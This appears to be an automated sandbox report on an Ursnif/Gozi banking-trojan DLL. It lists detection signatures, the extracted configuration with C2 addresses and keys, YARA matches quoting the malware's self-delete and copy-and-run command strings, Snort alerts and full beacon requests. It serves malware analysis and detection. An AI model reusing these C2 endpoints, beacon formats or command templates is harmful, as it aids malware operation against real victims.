Windows Analysis Report
Zeip.dll

Overview

General Information

Sample Name: Zeip.dll
Analysis ID: 790195
MD5: 85fa54c2a97ad3a1f8bd64af62450511
SHA1: db92c0a81e8b27d222607e093ccc9d00485db119
SHA256: e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35
Tags: dll

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 5308 cmdline: loaddll32.exe "C:\Users\user\Desktop\Zeip.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 244 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5412 cmdline: rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 4124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 416 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 444 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
Malware Configuration Extractor: Ursnif
{"RSA Public Key": "nEv1xgiiSSEq+UsF/sH972dYWlbdaVOznM6pMFVoUS05gtglJzWNlT7nMktPHUwL6//kjiNOqc4tDzQZ19ymuBpLEGqUVvC4ejuRj/0ho+UjebbguqPlH5n0kxpUzAwMML4tOLtp9LPhNicxLWntxqAhB5vWoa98iW2MUoUphRHcd2dO72hrBAGA6DCyFxDcS8WlyxVQ7VBx1Nh+pbslLneoja8gI1kgMhn78GgHQk/qR1oUbrcP/HgzqcZ46oTj/Z8oDh7Uf+bI3Bv799doULwM1Koc6uZt/pcclNdWQSZWvlVfFozPuVvT9NaBray36Sn10KTAPhwPYdk+nFxrudJjVCtbXTj4F13byKvdsT0=", "c2_domain": ["trackingg-protectioon.cdn4.mozilla.net", "80.77.23.77", "trackingg-protectioon.cdn4.mozilla.net", "80.77.25.109", "protectioon.cdn4.mozilla.net", "170.130.165.182", "protectioon.cdn4.mozilla.net", "80.77.25.114"], "botnet": "20005", "server": "50", "serpent_key": "OFX3RdYc8A5rFAaL", "sleep_time": "3", "CONF_TIMEOUT": "5", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings
00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_261f5ac5 | unknown | unknown
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
No Sigma rule has matched

Snort IDS Alerts

Timestamp: 01/23/23-23:00:21.133917
Source IP: 192.168.2.6
Destination IP: 80.77.23.77
SID: 2033204
Source Port: 49728
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/23/23-23:00:21.133917
Source IP: 192.168.2.6
Destination IP: 80.77.23.77
SID: 2033203
Source Port: 49728
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/23/23-23:01:31.648906
Source IP: 192.168.2.6
Destination IP: 80.77.25.109
SID: 2033203
Source Port: 49733
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/23/23-23:01:31.648906
Source IP: 192.168.2.6
Destination IP: 80.77.25.109
SID: 2033204
Source Port: 49733
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/23/23-23:02:42.232320
Source IP: 192.168.2.6
Destination IP: 170.130.165.182
SID: 2033203
Source Port: 49735
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/23/23-23:02:42.232320
Source IP: 192.168.2.6
Destination IP: 170.130.165.182
SID: 2033204
Source Port: 49735
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: Zeip.dll | Virustotal: Detection: 31%
Source: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q | Avira URL Cloud: Label: malware
Source: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak | Avira URL Cloud: Label: malware
Source: Zeip.dll | Joe Sandbox ML: detected
Source: 3.2.rundll32.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 00000003.00000002.773301251.0000000004A79000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "nEv1xgiiSSEq+UsF/sH972dYWlbdaVOznM6pMFVoUS05gtglJzWNlT7nMktPHUwL6//kjiNOqc4tDzQZ19ymuBpLEGqUVvC4ejuRj/0ho+UjebbguqPlH5n0kxpUzAwMML4tOLtp9LPhNicxLWntxqAhB5vWoa98iW2MUoUphRHcd2dO72hrBAGA6DCyFxDcS8WlyxVQ7VBx1Nh+pbslLneoja8gI1kgMhn78GgHQk/qR1oUbrcP/HgzqcZ46oTj/Z8oDh7Uf+bI3Bv799doULwM1Koc6uZt/pcclNdWQSZWvlVfFozPuVvT9NaBray36Sn10KTAPhwPYdk+nFxrudJjVCtbXTj4F13byKvdsT0=", "c2_domain": ["trackingg-protectioon.cdn4.mozilla.net", "80.77.23.77", "trackingg-protectioon.cdn4.mozilla.net", "80.77.25.109", "protectioon.cdn4.mozilla.net", "170.130.165.182", "protectioon.cdn4.mozilla.net", "80.77.25.114"], "botnet": "20005", "server": "50", "serpent_key": "OFX3RdYc8A5rFAaL", "sleep_time": "3", "CONF_TIMEOUT": "5", "SetWaitableTimer_value": "0"}
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04B96EB4 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_04B96EB4
Source: Zeip.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: Binary string: ZR@4Hk*7L7H|SDs!u.pdb | source: loaddll32.exe, 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmp, Zeip.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then push ebp 0_2_00401511
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then push ebp 0_2_00401511
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then push ebp 0_2_00401510

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 170.130.165.182 80
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: trackingg-protectioon.cdn4.mozilla.net
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 80.77.23.77 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 80.77.25.109 80
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: protectioon.cdn4.mozilla.net
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49728 -> 80.77.23.77:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49728 -> 80.77.23.77:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49733 -> 80.77.25.109:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49733 -> 80.77.25.109:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49735 -> 170.130.165.182:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49735 -> 170.130.165.182:80
Source: Joe Sandbox View | ASN Name: MEER-ASmeerfarbigGmbHCoKGDE
Source: Joe Sandbox View | ASN Name: MEER-ASmeerfarbigGmbHCoKGDE
Source: global traffic | HTTP traffic detected: GET /fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 80.77.23.77 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 80.77.25.109 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 170.130.165.182 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | DNS traffic detected: query: trackingg-protectioon.cdn4.mozilla.net reply code: Name error (3)
Source: unknown | DNS traffic detected: query: protectioon.cdn4.mozilla.net reply code: Name error (3)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 23 Jan 2023 22:00:21 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 548 | Connection: keep-alive | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 23 Jan 2023 22:01:31 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 548 | Connection: keep-alive | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 23 Jan 2023 22:02:42 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 548 | Connection: keep-alive | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.25.109
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.25.109
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.25.109
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.25.109
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.25.109
Source: unknown | TCP traffic detected without corresponding DNS query: 170.130.165.182
Source: unknown | TCP traffic detected without corresponding DNS query: 170.130.165.182
Source: unknown | TCP traffic detected without corresponding DNS query: 170.130.165.182
Source: unknown | TCP traffic detected without corresponding DNS query: 170.130.165.182
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.25.109
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: unknown | TCP traffic detected without corresponding DNS query: 80.77.23.77
Source: rundll32.exe, 00000003.00000002.772970164.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://170.130.165.182/
Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/fa
Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q
Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/
Source: rundll32.exe, 00000003.00000002.772970164.0000000000B32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://protectioon.cdn4.mozilla.net/fonts/zo_2F9LTFy1/2yei3vv_2FO_2B/_2FhNinG_2BU_2Bmlgeam/LapYRzVWz
Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://trackingg-protectioon.cdn4.mozilla.net/fonts/MCO7afnwu37/Dbba1QyGgF8xPz/p8nSqYopKMHf_2B9Qpctn
Source: unknown | DNS traffic detected: queries for: trackingg-protectioon.cdn4.mozilla.net
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04B95E3A ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,3_2_04B95E3A
Source: global traffic | HTTP traffic detected: GET /fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 80.77.23.77 | Connection: Keep-Alive | Cache-Control: no-cache
